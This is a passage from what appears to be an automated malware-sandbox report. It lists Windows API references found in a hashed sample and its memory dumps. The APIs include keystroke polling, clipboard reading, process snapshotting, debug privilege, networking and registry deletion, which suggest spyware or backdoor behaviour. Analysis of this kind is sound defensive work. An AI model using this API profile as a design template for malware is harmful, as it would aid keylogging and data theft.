\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"LCMapStringA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"HeapReAlloc\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CopyFileA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"SetFileTime\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"RtlUnwind\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetACP\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetLocalTime\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CreatePipe\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"PeekNamedPipe\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetFileSize\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"OpenProcess\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"SetFilePointer\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetCPInfo\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"TerminateThread\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GlobalUnlock\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetTimeZoneInformation\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CreateMutexA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CompareStringW\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CreateThread\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetStringTypeA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"FindFirstFileA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"OpenMutexA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"SetStdHandle\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetComputerNameA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"FindNextFileA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"RemoveDirectoryA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"ExitThread\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GlobalLock\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetStringTypeW\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"SetEnvironmentVariableA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GlobalMemoryStatus\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CreateProcessA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetEnvironmentVariableA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"HeapCreate\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GlobalAlloc\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"VirtualFree\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"FindClose\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"HeapDestroy\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"Sleep\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetFileType\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"SetEndOfFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetVersion\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CompareStringA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"ShellExecuteA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetAsyncKeyState\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"PostMessageA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"EnumWindows\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"EnumChildWindows\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"IsWindowVisible\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetWindowTextA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetClassNameA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CloseClipboard\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"ExitWindowsEx\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetClipboardData\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"OpenClipboard\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"InternetReadFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"InternetConnectA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"InternetCrackUrlA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"WSASocketA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"htonl\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"WSAStartup\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"getsockname\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"htons\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"gethostname\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"closesocket\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"ntohl\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"inet_addr\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"ntohs\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"gethostbyaddr\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"__WSAFDIsSet\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"WSACleanup\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"gethostbyname\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"inet_ntoa\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"WSAAsyncSelect\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"WSAIoctl\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetActiveWindow\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"WinHelp\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"InternetGetConnectedStateEx\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"Process32First\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"WinHelp\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetGetConnectedStateEx\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00004816.00000000.139125.00423000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00005072.00000000.139283.0041A000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005072.00000000.139283.0041A000.00000040.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005072.00000000.139283.0041A000.00000040.mdmp, 00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLocalTime\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalUnlock\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalLock\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileTime\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileTime\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalMemoryStatus\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindNextFileA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitThread\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreatePipe\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalAlloc\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetComputerNameA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetEnvironmentVariableA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CompareStringW\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CompareStringA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetEndOfFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetOEMCP\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCPInfo\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeW\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetStdHandle\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileType\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetHandleCount\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"TerminateThread\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenMutexA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CopyFileA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"PeekNamedPipe\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapCreate\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapDestroy\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentVariableA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LCMapStringW\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LCMapStringA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetVersion\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemTime\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTimeZoneInformation\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RemoveDirectoryA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ControlService\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteKeyA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: 